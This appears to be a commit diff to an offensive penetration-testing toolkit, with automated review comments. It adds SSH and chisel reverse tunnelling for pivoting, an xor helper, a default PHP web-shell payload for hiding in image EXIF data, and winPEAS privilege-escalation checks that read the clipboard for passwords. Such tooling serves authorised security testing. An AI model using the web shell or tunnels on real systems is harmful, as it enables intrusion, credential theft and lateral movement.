commands = []
|
||||||
@ -238,7 +336,13 @@ def create_tunnel(shell, ports: list):
|
|||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
|
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
|
||||||
|
return t
|
||||||
elif isinstance(shell, paramiko.SSHClient):
|
elif isinstance(shell, paramiko.SSHClient):
|
||||||
|
|
||||||
|
paramiko_tunnel = ParamikoTunnel(shell, ports)
|
||||||
|
paramiko_tunnel.start_background()
|
||||||
|
return paramiko_tunnel
|
||||||
|
|
||||||
# TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
|
# TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
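Review bot: The relay loop in `ParamikoTunnelHandler.handle()` uses `chan.send(data)` and `self.request.send(data)`, both of which may transmit fewer bytes than handed to them, so forwarded data is silently truncated under backpressure; both should be `sendall`. If either `recv` raises (a reset from the local client, or the SSH transport dropping), the loop exits by exception and `chan.close()` is never reached, leaking the direct-tcpip channel on the transport, so the loop also needs a `try`/`finally` around it, with `peername` captured before the loop because `getpeername()` can fail on a reset socket. In `ParamikoTunnel.close()`, `server._BaseServer__shutdown_request = True` pokes a name-mangled private of `socketserver.BaseServer`; the public `server.shutdown()` does the same job and `server.server_close()` releases the listening socket, which the current code never closes. The `try: import SocketServer` fallback is dead on Python 3, which the f-strings elsewhere in this file already require.
```python
        # … unchanged: open_channel, rejection handling and the "Connected!" log …
        peername = self.request.getpeername()
        try:
            while True:
                r, w, x = select.select([self.request, chan], [], [])
                if self.request in r:
                    data = self.request.recv(1024)
                    if len(data) == 0:
                        break
                    chan.sendall(data)
                if chan in r:
                    data = chan.recv(1024)
                    if len(data) == 0:
                        break
                    self.request.sendall(data)
        finally:
            chan.close()
            self.request.close()
            self.log("Tunnel closed from %r" % (peername,))
```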
0
uptux.py
Normal file → Executable file
0
uptux.py
Normal file → Executable file
47
util.py
47
util.py
@ -1,7 +1,9 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
import random
|
import random
|
||||||
|
import math
|
||||||
import socket
|
import socket
|
||||||
|
import itertools
|
||||||
import netifaces as ni
|
import netifaces as ni
|
||||||
import string
|
import string
|
||||||
import sys
|
import sys
|
||||||
@ -44,15 +46,20 @@ def exit_with_error(res, err):
|
|||||||
exit()
|
exit()
|
||||||
|
|
||||||
def assert_status_code(res, status_code, err=None):
|
def assert_status_code(res, status_code, err=None):
|
||||||
if res.status_code != status_code:
|
if type(status_code) == int and res.status_code != status_code:
|
||||||
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
|
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
|
||||||
|
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
|
||||||
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def assert_header_present(res, header, err=None):
|
def assert_location(res, location, err=None):
|
||||||
if header in res.headers:
|
assert_header_present(res, "Location")
|
||||||
|
location_header = res.headers["Location"].lower()
|
||||||
|
if location_header == location.lower():
|
||||||
return
|
return
|
||||||
|
|
||||||
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
|
err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def assert_content_type(res, content_type, err=None):
|
def assert_content_type(res, content_type, err=None):
|
||||||
@ -66,6 +73,13 @@ def assert_content_type(res, content_type, err=None):
|
|||||||
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
|
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
|
||||||
|
def assert_header_present(res, header, err=None):
|
||||||
|
if header in res.headers:
|
||||||
|
return
|
||||||
|
|
||||||
|
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
|
||||||
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def openServer(address, ports=None):
|
def openServer(address, ports=None):
|
||||||
listenPort = None
|
listenPort = None
|
||||||
retry = True
|
retry = True
|
||||||
@ -149,6 +163,29 @@ def pad(x, n):
|
|||||||
x += (n-(len(x)%n))*b"\x00"
|
x += (n-(len(x)%n))*b"\x00"
|
||||||
return x
|
return x
|
||||||
|
|
||||||
|
def xor(a, b):
|
||||||
|
if len(a) == 0 or len(b) == 0:
|
||||||
|
return a
|
||||||
|
|
||||||
|
if len(a) < len(b):
|
||||||
|
a *= int(math.ceil((len(b)/len(a))))
|
||||||
|
a = a[0:len(b)]
|
||||||
|
elif len(b) < len(a):
|
||||||
|
b *= int(math.ceil((len(a)/len(b))))
|
||||||
|
b = b[0:len(a)]
|
||||||
|
|
||||||
|
if type(a) == str and type(b) == str:
|
||||||
|
return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
|
||||||
|
else:
|
||||||
|
if type(a) != bytes:
|
||||||
|
a = a.encode()
|
||||||
|
if type(b) != bytes:
|
||||||
|
b = b.encode()
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
|
||||||
|
|
||||||
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
|
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
|
||||||
import exif
|
import exif
|
||||||
|
|
||||||
|
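Review bot: In `assert_status_code`, the new iterable branch builds its message with `','.join(status_code)`, which raises `TypeError` when the expected codes are ints (the normal case), so the helper crashes instead of reporting the mismatch; use `','.join(map(str, status_code))`. The type test reads better as `isinstance(status_code, int)`, and since a `str` also satisfies `hasattr(..., '__iter__')`, a stray `"200"` reaches the `in` test and fails with an unrelated TypeError — excluding `str` there would give a clear error instead. In the later `xor` hunk, `b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])` is more simply `bytes(c1 ^ c2 for c1, c2 in zip(a, b))`, and the three blank lines before it look accidental.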
BIN
win/chisel.exe
BIN
win/chisel.exe
Binary file not shown.
BIN
win/chisel64.exe
BIN
win/chisel64.exe
Binary file not shown.
@ -10,6 +10,14 @@ REM Registry scan of other drives besides
|
|||||||
REM /////true or false
|
REM /////true or false
|
||||||
SET long=false
|
SET long=false
|
||||||
|
|
||||||
|
REM Check if the current path contains spaces
|
||||||
|
SET "CurrentFolder=%~dp0"
|
||||||
|
IF "!CurrentFolder!" NEQ "!CurrentFolder: =!" (
|
||||||
|
ECHO winPEAS.bat cannot run if the current path contains spaces.
|
||||||
|
ECHO Exiting.
|
||||||
|
EXIT /B 1
|
||||||
|
)
|
||||||
|
|
||||||
:Splash
|
:Splash
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m"
|
CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m"
|
||||||
@ -52,7 +60,7 @@ CALL :ColorLine " %E%41mUse it at your own networks and/or with the network ow
|
|||||||
ECHO.
|
ECHO.
|
||||||
|
|
||||||
:SystemInfo
|
:SystemInfo
|
||||||
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
|
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
||||||
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
|
||||||
@ -404,7 +412,7 @@ CALL :T_Progress 1
|
|||||||
|
|
||||||
:CurrentClipboard
|
:CurrentClipboard
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
|
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
|
||||||
ECHO. [i] Any password inside the clipboard?
|
ECHO. [i] Any passwords inside the clipboard?
|
||||||
powershell -command "Get-Clipboard" 2>nul
|
powershell -command "Get-Clipboard" 2>nul
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -565,7 +573,7 @@ CALL :T_Progress 2
|
|||||||
|
|
||||||
:AppCMD
|
:AppCMD
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
|
||||||
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
|
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.